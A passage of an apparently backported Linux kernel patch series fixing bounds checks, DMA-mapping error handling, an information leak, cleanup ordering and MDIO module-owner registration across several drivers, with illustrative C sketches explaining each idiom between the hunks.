+-	descr->skb = dev_alloc_skb(bufsize + GELIC_NET_RXBUF_ALIGN - 1);
++	descr->skb = netdev_alloc_skb(*card->netdev, rx_skb_size);
+ 	if (!descr->skb) {
+ 		descr->buf_addr = 0; /* tell DMAC don't touch memory */
+ 		return -ENOMEM;
+ 	}
+-	descr->buf_size = cpu_to_be32(bufsize);
++	descr->buf_size = cpu_to_be32(rx_skb_size);
+ 	descr->dmac_cmd_status = 0;
+ 	descr->result_size = 0;
+ 	descr->valid_size = 0;
+@@ -395,11 +399,10 @@ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 	if (offset)
+ 		skb_reserve(descr->skb, GELIC_NET_RXBUF_ALIGN - offset);
+ 	/* io-mmu-map the skb */
+-	descr->buf_addr = cpu_to_be32(dma_map_single(ctodev(card),
+-						     descr->skb->data,
+-						     GELIC_NET_MAX_MTU,
+-						     DMA_FROM_DEVICE));
+-	if (!descr->buf_addr) {
++	cpu_addr = dma_map_single(ctodev(card), descr->skb->data,
++				  GELIC_NET_MAX_FRAME, DMA_FROM_DEVICE);
++	descr->buf_addr = cpu_to_be32(cpu_addr);
++	if (dma_mapping_error(ctodev(card), cpu_addr)) {
+ 		dev_kfree_skb_any(descr->skb);
+ 		descr->skb = NULL;
+ 		dev_info(ctodev(card),
+@@ -779,7 +782,7 @@ static int gelic_descr_prepare_tx(struct gelic_card *card,
+ 
+ 	buf = dma_map_single(ctodev(card), skb->data, skb->len, DMA_TO_DEVICE);
+ 
+-	if (!buf) {
++	if (dma_mapping_error(ctodev(card), buf)) {
+ 		dev_err(ctodev(card),
+ 			"dma map 2 failed (%p, %i). Dropping packet\n",
+ 			skb->data, skb->len);
+@@ -915,7 +918,7 @@ static void gelic_net_pass_skb_up(struct gelic_descr *descr,
+ 	data_error = be32_to_cpu(descr->data_error);
+ 	/* unmap skb buffer */
+ 	dma_unmap_single(ctodev(card), be32_to_cpu(descr->buf_addr),
+-			 GELIC_NET_MAX_MTU,
++			 GELIC_NET_MAX_FRAME,
+ 			 DMA_FROM_DEVICE);
+ 
+ 	skb_put(skb, be32_to_cpu(descr->valid_size)?
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.h b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+index 68f324ed4eaf0..0d98defb011ed 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.h
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+@@ -19,8 +19,9 @@
+ #define GELIC_NET_RX_DESCRIPTORS        128 /* num of descriptors */
+ #define GELIC_NET_TX_DESCRIPTORS        128 /* num of descriptors */
+ 
+-#define GELIC_NET_MAX_MTU               VLAN_ETH_FRAME_LEN
+-#define GELIC_NET_MIN_MTU               VLAN_ETH_ZLEN
++#define GELIC_NET_MAX_FRAME             2312
++#define GELIC_NET_MAX_MTU               2294
++#define GELIC_NET_MIN_MTU               64
+ #define GELIC_NET_RXBUF_ALIGN           128
+ #define GELIC_CARD_RX_CSUM_DEFAULT      1 /* hw chksum */
+ #define GELIC_NET_WATCHDOG_TIMEOUT      5*HZ
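
/*
 * Sketch of the RX sizing rule the gelic change encodes: round the
 * maximum frame up to the 128-byte DMA alignment, over-allocate by
 * (align - 1), then skb_reserve() the slack so skb->data itself is
 * aligned. The EX_* constants are stand-ins for the driver's macros.
 */
#include <linux/netdevice.h>
#include <linux/skbuff.h>

#define EX_MAX_FRAME	2312
#define EX_RXBUF_ALIGN	128

static struct sk_buff *ex_alloc_rx_skb(struct net_device *ndev)
{
	unsigned int size = ALIGN(EX_MAX_FRAME, EX_RXBUF_ALIGN) +
			    EX_RXBUF_ALIGN - 1;
	struct sk_buff *skb = netdev_alloc_skb(ndev, size);
	unsigned long offset;

	if (!skb)
		return NULL;

	offset = (unsigned long)skb->data & (EX_RXBUF_ALIGN - 1);
	if (offset)
		skb_reserve(skb, EX_RXBUF_ALIGN - offset);
	return skb;
}
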
+diff --git a/drivers/net/ethernet/xircom/xirc2ps_cs.c b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+index 894e92ef415b9..9f505cf02d965 100644
+--- a/drivers/net/ethernet/xircom/xirc2ps_cs.c
++++ b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+@@ -503,6 +503,11 @@ static void
+ xirc2ps_detach(struct pcmcia_device *link)
+ {
+     struct net_device *dev = link->priv;
++    struct local_info *local = netdev_priv(dev);
++
++    netif_carrier_off(dev);
++    netif_tx_disable(dev);
++    cancel_work_sync(&local->tx_timeout_task);
+ 
+     dev_dbg(&link->dev, "detach\n");
+ 
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index e1a569b99e4a6..0b0c6c0764fe9 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1913,6 +1913,8 @@ static int ca8210_skb_tx(
+ 	 * packet
+ 	 */
+ 	mac_len = ieee802154_hdr_peek_addrs(skb, &header);
++	if (mac_len < 0)
++		return mac_len;
+ 
+ 	secspec.security_level = header.sec.level;
+ 	secspec.key_id_mode = header.sec.key_id_mode;
+diff --git a/drivers/net/mdio/acpi_mdio.c b/drivers/net/mdio/acpi_mdio.c
+index d77c987fda9cd..4630dde019749 100644
+--- a/drivers/net/mdio/acpi_mdio.c
++++ b/drivers/net/mdio/acpi_mdio.c
+@@ -18,16 +18,18 @@ MODULE_AUTHOR("Calvin Johnson <calvin.johnson@oss.nxp.com>");
+ MODULE_LICENSE("GPL");
+ 
+ /**
+- * acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
++ * __acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
+  * @mdio: pointer to mii_bus structure
+  * @fwnode: pointer to fwnode of MDIO bus. This fwnode is expected to represent
+  * an ACPI device object corresponding to the MDIO bus and its children are
+  * expected to correspond to the PHY devices on that bus.
++ * @owner: module owning this @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @fwnode.
+  */
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner)
+ {
+ 	struct fwnode_handle *child;
+ 	u32 addr;
+@@ -35,7 +37,7 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 
+ 	/* Mask out all PHYs from auto probing. */
+ 	mdio->phy_mask = GENMASK(31, 0);
+-	ret = mdiobus_register(mdio);
++	ret = __mdiobus_register(mdio, owner);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -55,4 +57,4 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 	}
+ 	return 0;
+ }
+-EXPORT_SYMBOL(acpi_mdiobus_register);
++EXPORT_SYMBOL(__acpi_mdiobus_register);
+diff --git a/drivers/net/mdio/mdio-thunder.c b/drivers/net/mdio/mdio-thunder.c
+index 822d2cdd2f359..394b864aaa372 100644
+--- a/drivers/net/mdio/mdio-thunder.c
++++ b/drivers/net/mdio/mdio-thunder.c
+@@ -104,6 +104,7 @@ static int thunder_mdiobus_pci_probe(struct pci_dev *pdev,
+ 		if (i >= ARRAY_SIZE(nexus->buses))
+ 			break;
+ 	}
++	fwnode_handle_put(fwn);
+ 	return 0;
+ 
+ err_release_regions:
+diff --git a/drivers/net/mdio/of_mdio.c b/drivers/net/mdio/of_mdio.c
+index 510822d6d0d90..1e46e39f5f46a 100644
+--- a/drivers/net/mdio/of_mdio.c
++++ b/drivers/net/mdio/of_mdio.c
+@@ -139,21 +139,23 @@ bool of_mdiobus_child_is_phy(struct device_node *child)
+ EXPORT_SYMBOL(of_mdiobus_child_is_phy);
+ 
+ /**
+- * of_mdiobus_register - Register mii_bus and create PHYs from the device tree
++ * __of_mdiobus_register - Register mii_bus and create PHYs from the device tree
+  * @mdio: pointer to mii_bus structure
+  * @np: pointer to device_node of MDIO bus.
++ * @owner: module owning the @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @np.
+  */
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner)
+ {
+ 	struct device_node *child;
+ 	bool scanphys = false;
+ 	int addr, rc;
+ 
+ 	if (!np)
+-		return mdiobus_register(mdio);
++		return __mdiobus_register(mdio, owner);
+ 
+ 	/* Do not continue if the node is disabled */
+ 	if (!of_device_is_available(np))
+@@ -172,7 +174,7 @@ int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
+ 	of_property_read_u32(np, "reset-post-delay-us", &mdio->reset_post_delay_us);
+ 
+ 	/* Register the MDIO bus */
+-	rc = mdiobus_register(mdio);
++	rc = __mdiobus_register(mdio, owner);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -236,7 +238,7 @@ unregister:
+ 	mdiobus_unregister(mdio);
+ 	return rc;
+ }
+-EXPORT_SYMBOL(of_mdiobus_register);
++EXPORT_SYMBOL(__of_mdiobus_register);
+ 
+ /**
+  * of_mdio_find_device - Given a device tree node, find the mdio_device
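
/*
 * The renames above follow the usual owner-threading convention: the
 * exported symbol gains a struct module argument, and a header-side
 * macro keeps existing call sites working. Presumably the companion
 * header change looks roughly like this sketch (not quoted from this
 * patch):
 */
#include <linux/module.h>

struct mii_bus;
struct device_node;

int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
			  struct module *owner);

#define of_mdiobus_register(mdio, np) \
	__of_mdiobus_register(mdio, np, THIS_MODULE)
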
+diff --git a/drivers/net/phy/mdio_devres.c b/drivers/net/phy/mdio_devres.c
+index b560e99695dfd..69b829e6ab35b 100644
+--- a/drivers/net/phy/mdio_devres.c
++++ b/drivers/net/phy/mdio_devres.c
+@@ -98,13 +98,14 @@ EXPORT_SYMBOL(__devm_mdiobus_register);
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ /**
+- * devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
++ * __devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
+  * @dev:	Device to register mii_bus for
+  * @mdio:	MII bus structure to register
+  * @np:		Device node to parse
++ * @owner:	Owning module
+  */
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np)
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner)
+ {
+ 	struct mdiobus_devres *dr;
+ 	int ret;
+@@ -117,7 +118,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	if (!dr)
+ 		return -ENOMEM;
+ 
+-	ret = of_mdiobus_register(mdio, np);
++	ret = __of_mdiobus_register(mdio, np, owner);
+ 	if (ret) {
+ 		devres_free(dr);
+ 		return ret;
+@@ -127,7 +128,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	devres_add(dev, dr);
+ 	return 0;
+ }
+-EXPORT_SYMBOL(devm_of_mdiobus_register);
++EXPORT_SYMBOL(__devm_of_mdiobus_register);
+ #endif /* CONFIG_OF_MDIO */
+ 
+ MODULE_LICENSE("GPL");
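
/*
 * Sketch of the devres idiom __devm_of_mdiobus_register() relies on:
 * allocate a release record first, perform the real registration, then
 * devres_add() so unregistration runs automatically when the device
 * detaches. Names prefixed ex_ are illustrative.
 */
#include <linux/device.h>
#include <linux/phy.h>

struct ex_mdiobus_devres {
	struct mii_bus *mii;
};

static void ex_mdiobus_release(struct device *dev, void *res)
{
	mdiobus_unregister(((struct ex_mdiobus_devres *)res)->mii);
}

static int ex_devm_mdiobus_register(struct device *dev, struct mii_bus *mii)
{
	struct ex_mdiobus_devres *dr;
	int ret;

	dr = devres_alloc(ex_mdiobus_release, sizeof(*dr), GFP_KERNEL);
	if (!dr)
		return -ENOMEM;

	ret = mdiobus_register(mii);
	if (ret) {
		devres_free(dr);
		return ret;
	}

	dr->mii = mii;
	devres_add(dev, dr);
	return 0;
}
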
+diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c
+index e741d8aebffe1..d1aea767ed09f 100644
+--- a/drivers/net/phy/phy.c
++++ b/drivers/net/phy/phy.c
+@@ -57,6 +57,18 @@ static const char *phy_state_to_str(enum phy_state st)
+ 	return NULL;
+ }
+ 
++static void phy_process_state_change(struct phy_device *phydev,
++				     enum phy_state old_state)
++{
++	if (old_state != phydev->state) {
++		phydev_dbg(phydev, "PHY state change %s -> %s\n",
++			   phy_state_to_str(old_state),
++			   phy_state_to_str(phydev->state));
++		if (phydev->drv && phydev->drv->link_change_notify)
++			phydev->drv->link_change_notify(phydev);
++	}
++}
++
+ static void phy_link_up(struct phy_device *phydev)
+ {
+ 	phydev->phy_link_change(phydev, true);
+@@ -1093,6 +1105,7 @@ EXPORT_SYMBOL(phy_free_interrupt);
+ void phy_stop(struct phy_device *phydev)
+ {
+ 	struct net_device *dev = phydev->attached_dev;
++	enum phy_state old_state;
+ 
+ 	if (!phy_is_started(phydev) && phydev->state != PHY_DOWN) {
+ 		WARN(1, "called from state %s\n",
+@@ -1101,6 +1114,7 @@ void phy_stop(struct phy_device *phydev)
+ 	}
+ 
+ 	mutex_lock(&phydev->lock);
++	old_state = phydev->state;
+ 
+ 	if (phydev->state == PHY_CABLETEST) {
+ 		phy_abort_cable_test(phydev);
+@@ -1111,6 +1125,7 @@ void phy_stop(struct phy_device *phydev)
+ 		sfp_upstream_stop(phydev->sfp_bus);
+ 
+ 	phydev->state = PHY_HALTED;
++	phy_process_state_change(phydev, old_state);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -1228,13 +1243,7 @@ void phy_state_machine(struct work_struct *work)
+ 	if (err < 0)
+ 		phy_error(phydev);
+ 
+-	if (old_state != phydev->state) {
+-		phydev_dbg(phydev, "PHY state change %s -> %s\n",
+-			   phy_state_to_str(old_state),
+-			   phy_state_to_str(phydev->state));
+-		if (phydev->drv && phydev->drv->link_change_notify)
+-			phydev->drv->link_change_notify(phydev);
+-	}
++	phy_process_state_change(phydev, old_state);
+ 
+ 	/* Only re-schedule a PHY state machine change if we are polling the
+ 	 * PHY, if PHY_MAC_INTERRUPT is set, then we will be moving
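
/*
 * Condensed sketch of the pattern phy_stop() gains above: record the
 * state under the lock, change it, and let one shared helper decide
 * whether a transition actually happened before notifying. The
 * structure is trimmed to the essentials and is not the real
 * struct phy_device.
 */
#include <linux/mutex.h>
#include <linux/printk.h>

struct ex_phy {
	struct mutex lock;
	int state;
};

static void ex_process_state_change(struct ex_phy *phy, int old_state)
{
	if (old_state != phy->state)
		pr_debug("PHY state change %d -> %d\n", old_state, phy->state);
}

static void ex_phy_stop(struct ex_phy *phy, int halted_state)
{
	int old_state;

	mutex_lock(&phy->lock);
	old_state = phy->state;
	phy->state = halted_state;
	ex_process_state_change(phy, old_state);
	mutex_unlock(&phy->lock);
}
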
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 11f60d32be82e..6eacbf17f1c0c 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -666,8 +666,9 @@ static int asix_resume(struct usb_interface *intf)
+ static int ax88772_init_mdio(struct usbnet *dev)
+ {
+ 	struct asix_common_private *priv = dev->driver_priv;
++	int ret;
+ 
+-	priv->mdio = devm_mdiobus_alloc(&dev->udev->dev);
++	priv->mdio = mdiobus_alloc();
+ 	if (!priv->mdio)
+ 		return -ENOMEM;
+ 
+@@ -679,7 +680,20 @@ static int ax88772_init_mdio(struct usbnet *dev)
+ 	snprintf(priv->mdio->id, MII_BUS_ID_SIZE, "usb-%03d:%03d",
+ 		 dev->udev->bus->busnum, dev->udev->devnum);
+ 
+-	return devm_mdiobus_register(&dev->udev->dev, priv->mdio);
++	ret = mdiobus_register(priv->mdio);
++	if (ret) {
++		netdev_err(dev->net, "Could not register MDIO bus (err %d)\n", ret);
++		mdiobus_free(priv->mdio);
++		priv->mdio = NULL;
++	}
++
++	return ret;
++}
++
++static void ax88772_mdio_unregister(struct asix_common_private *priv)
++{
++	mdiobus_unregister(priv->mdio);
++	mdiobus_free(priv->mdio);
+ }
+ 
+ static int ax88772_init_phy(struct usbnet *dev)
+@@ -897,16 +911,23 @@ static int ax88772_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	ret = ax88772_init_mdio(dev);
+ 	if (ret)
+-		return ret;
++		goto mdio_err;
+ 
+ 	ret = ax88772_phylink_setup(dev);
+ 	if (ret)
+-		return ret;
++		goto phylink_err;
+ 
+ 	ret = ax88772_init_phy(dev);
+ 	if (ret)
+-		phylink_destroy(priv->phylink);
++		goto initphy_err;
+ 
++	return 0;
++
++initphy_err:
++	phylink_destroy(priv->phylink);
++phylink_err:
++	ax88772_mdio_unregister(priv);
++mdio_err:
+ 	return ret;
+ }
+ 
+@@ -927,6 +948,7 @@ static void ax88772_unbind(struct usbnet *dev, struct usb_interface *intf)
+ 	phylink_disconnect_phy(priv->phylink);
+ 	rtnl_unlock();
+ 	phylink_destroy(priv->phylink);
++	ax88772_mdio_unregister(priv);
+ 	asix_rx_fixup_common_free(dev->driver_priv);
+ }
+ 
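
/*
 * The bind() path above now unwinds in strict reverse order, each
 * failure label undoing exactly the steps that already succeeded. A
 * skeletal version of that goto-ladder idiom, with placeholder helpers
 * standing in for the MDIO/phylink/PHY steps:
 */
int ex_mdio_init(void);		/* mdiobus_alloc() + mdiobus_register() */
int ex_phylink_setup(void);
int ex_phy_init(void);
void ex_phylink_destroy(void);
void ex_mdio_unregister(void);	/* mdiobus_unregister() + mdiobus_free() */

static int ex_bind(void)
{
	int ret;

	ret = ex_mdio_init();
	if (ret)
		goto mdio_err;

	ret = ex_phylink_setup();
	if (ret)
		goto phylink_err;

	ret = ex_phy_init();
	if (ret)
		goto initphy_err;

	return 0;

initphy_err:
	ex_phylink_destroy();
phylink_err:
	ex_mdio_unregister();
mdio_err:
	return ret;
}
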
+diff --git a/drivers/net/usb/cdc_mbim.c b/drivers/net/usb/cdc_mbim.c
+index c89639381eca3..cd4083e0b3b9e 100644
+--- a/drivers/net/usb/cdc_mbim.c
++++ b/drivers/net/usb/cdc_mbim.c
+@@ -665,6 +665,11 @@ static const struct usb_device_id mbim_devs[] = {
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
+ 	},
+ 
++	/* Telit FE990 */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x1bc7, 0x1081, USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
++	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
++	},
++
+ 	/* default entry */
+ 	{ USB_INTERFACE_INFO(USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_zlp,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 068488890d57b..c458c030fadf6 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3579,13 +3579,29 @@ static int lan78xx_rx(struct lan78xx_net *dev, struct sk_buff *skb,
+ 		size = (rx_cmd_a & RX_CMD_A_LEN_MASK_);
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x", rx_cmd_a);
+ 		} else {
+-			u32 frame_len = size - ETH_FCS_LEN;
++			u32 frame_len;
+ 			struct sk_buff *skb2;
+ 
++			if (unlikely(size < ETH_FCS_LEN)) {
++				netif_dbg(dev, rx_err, dev->net,
++					  "size err rx_cmd_a=0x%08x\n",
++					  rx_cmd_a);
++				return 0;
++			}
++
++			frame_len = size - ETH_FCS_LEN;
++
+ 			skb2 = napi_alloc_skb(&dev->napi, frame_len);
+ 			if (!skb2)
+ 				return 0;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 554d4e2a84a4e..2cc28af52ee25 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1363,6 +1363,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1057, 2)},	/* Telit FN980 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 32d2c60d334dc..563ecd27b93ea 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -1833,6 +1833,12 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (u16)((header & RX_STS_FL_) >> 16);
+ 		align_count = (4 - ((size + NET_IP_ALIGN) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err header=0x%08x\n", header);
++			return 0;
++		}
++
+ 		if (unlikely(header & RX_STS_ES_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error header=0x%08x\n", header);
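
/*
 * Both lan78xx and smsc95xx gain the same defensive checks: the
 * hardware-reported frame size is untrusted input, so it is bounded by
 * the data actually received, and the minimum is checked before
 * subtracting the FCS so the length cannot wrap. A distilled sketch
 * with an invented helper name:
 */
#include <linux/if_ether.h>
#include <linux/skbuff.h>
#include <linux/types.h>

static int ex_validate_rx_size(const struct sk_buff *skb, u32 size,
			       u32 *frame_len)
{
	if (unlikely(size > skb->len))		/* claims more than we have */
		return -EINVAL;

	if (unlikely(size < ETH_FCS_LEN))	/* size - ETH_FCS_LEN would wrap */
		return -EINVAL;

	*frame_len = size - ETH_FCS_LEN;
	return 0;
}
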
+diff --git a/drivers/platform/chrome/cros_ec_chardev.c b/drivers/platform/chrome/cros_ec_chardev.c
+index 0de7c255254e0..d6de5a2941282 100644
+--- a/drivers/platform/chrome/cros_ec_chardev.c
++++ b/drivers/platform/chrome/cros_ec_chardev.c
+@@ -284,7 +284,7 @@ static long cros_ec_chardev_ioctl_xcmd(struct cros_ec_dev *ec, void __user *arg)
+ 	    u_cmd.insize > EC_MAX_MSG_BYTES)
+ 		return -EINVAL;
+ 
+-	s_cmd = kmalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
++	s_cmd = kzalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
+ 			GFP_KERNEL);
+ 	if (!s_cmd)
+ 		return -ENOMEM;
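
/*
 * Sketch of the info-leak class the cros_ec change closes: a buffer
 * that is copied back to user space must be zero-initialized when the
 * device may fill only part of it. The ioctl shape below is
 * hypothetical.
 */
#include <linux/slab.h>
#include <linux/uaccess.h>

static long ex_ioctl_xcmd(void __user *arg, size_t len)
{
	long ret = 0;
	void *buf = kzalloc(len, GFP_KERNEL);	/* kmalloc() would leak
						 * stale heap bytes below */
	if (!buf)
		return -ENOMEM;

	/* ... device fills an unknown prefix of buf ... */

	if (copy_to_user(arg, buf, len))
		ret = -EFAULT;

	kfree(buf);
	return ret;
}
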
+diff --git a/drivers/platform/x86/intel/int3472/tps68470_board_data.c b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+index 309eab9c05588..322237e056f32 100644
+--- a/drivers/platform/x86/intel/int3472/tps68470_board_data.c
++++ b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+@@ -159,9 +159,10 @@ static const struct int3472_tps68470_board_data surface_go_tps68470_board_data =
+ static const struct int3472_tps68470_board_data surface_go3_tps68470_board_data = {
+ 	.dev_name = "i2c-INT3472:01",
+ 	.tps68470_regulator_pdata = &surface_go_tps68470_pdata,
+-	.n_gpiod_lookups = 1,
++	.n_gpiod_lookups = 2,
+ 	.tps68470_gpio_lookup_tables = {
+-		&surface_go_int347a_gpios
++		&surface_go_int347a_gpios,
++		&surface_go_int347e_gpios,
+ 	},
+ };
+ 
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index 2274679c5ddd2..d7400b56820d6 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1906,6 +1906,7 @@ static void bq24190_remove(struct i2c_client *client)
+ 	struct bq24190_dev_info *bdi = i2c_get_clientdata(client);
+ 	int error;
+ 
++	cancel_delayed_work_sync(&bdi->input_current_limit_work);
+ 	error = pm_runtime_resume_and_get(bdi->dev);
+ 	if (error < 0)
+ 		dev_warn(bdi->dev, "pm_runtime_get failed: %i\n", error);
+diff --git a/drivers/power/supply/da9150-charger.c b/drivers/power/supply/da9150-charger.c
+index f9314cc0cd75f..6b987da586556 100644
+--- a/drivers/power/supply/da9150-charger.c
++++ b/drivers/power/supply/da9150-charger.c
+@@ -662,6 +662,7 @@ static int da9150_charger_remove(struct platform_device *pdev)
+ 
+ 	if (!IS_ERR_OR_NULL(charger->usb_phy))
+ 		usb_unregister_notifier(charger->usb_phy, &charger->otg_nb);
++	cancel_work_sync(&charger->otg_work);
+ 
+ 	power_supply_unregister(charger->battery);
+ 	power_supply_unregister(charger->usb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 610a51538f034..0781f991e7845 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -1117,10 +1117,12 @@ static int alua_activate(struct scsi_device *sdev,
+ 	rcu_read_unlock();
+ 	mutex_unlock(&h->init_mutex);
+ 
+-	if (alua_rtpg_queue(pg, sdev, qdata, true))
++	if (alua_rtpg_queue(pg, sdev, qdata, true)) {
+ 		fn = NULL;
+-	else
++	} else {
++		kfree(qdata);
+ 		err = SCSI_DH_DEV_OFFLINED;
++	}
+ 	kref_put(&pg->kref, release_port_group);
+ out:
+ 	if (fn)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index d56b4bfd27678..620dcefe7b6f4 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2448,8 +2448,7 @@ static int interrupt_preinit_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->cq_nvecs = vectors - BASE_VECTORS_V3_HW;
+ 	shost->nr_hw_queues = hisi_hba->cq_nvecs;
+ 
+-	devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+-	return 0;
++	return devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+ }
+ 
+ static int interrupt_init_v3_hw(struct hisi_hba *hisi_hba)
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index b535f1fd30100..2f38c8d5a48a9 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7234,6 +7234,8 @@ lpfc_sli4_cgn_params_read(struct lpfc_hba *phba)
+ 	/* Find out if the FW has a new set of congestion parameters. */
+ 	len = sizeof(struct lpfc_cgn_param);
+ 	pdata = kzalloc(len, GFP_KERNEL);
++	if (!pdata)
++		return -ENOMEM;
+ 	ret = lpfc_read_object(phba, (char *)LPFC_PORT_CFG_NAME,
+ 			       pdata, len);
+ 
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index b93c948c4fcc4..b44bb3ae22ad9 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -21886,20 +21886,20 @@ lpfc_get_io_buf_from_private_pool(struct lpfc_hba *phba,
+ static struct lpfc_io_buf *
+ lpfc_get_io_buf_from_expedite_pool(struct lpfc_hba *phba)
+ {
+-	struct lpfc_io_buf *lpfc_ncmd;
++	struct lpfc_io_buf *lpfc_ncmd = NULL, *iter;
+ 	struct lpfc_io_buf *lpfc_ncmd_next;
+ 	unsigned long iflag;
+ 	struct lpfc_epd_pool *epd_pool;
+ 
+ 	epd_pool = &phba->epd_pool;
+-	lpfc_ncmd = NULL;
+ 
+ 	spin_lock_irqsave(&epd_pool->lock, iflag);
+ 	if (epd_pool->count > 0) {
+-		list_for_each_entry_safe(lpfc_ncmd, lpfc_ncmd_next,
++		list_for_each_entry_safe(iter, lpfc_ncmd_next,
+ 					 &epd_pool->list, list) {
+-			list_del(&lpfc_ncmd->list);
++			list_del(&iter->list);
+ 			epd_pool->count--;
++			lpfc_ncmd = iter;
+ 			break;
+ 		}
+ 	}
+@@ -22096,10 +22096,6 @@ lpfc_read_object(struct lpfc_hba *phba, char *rdobject, uint32_t *datap,
+ 	struct lpfc_dmabuf *pcmd;
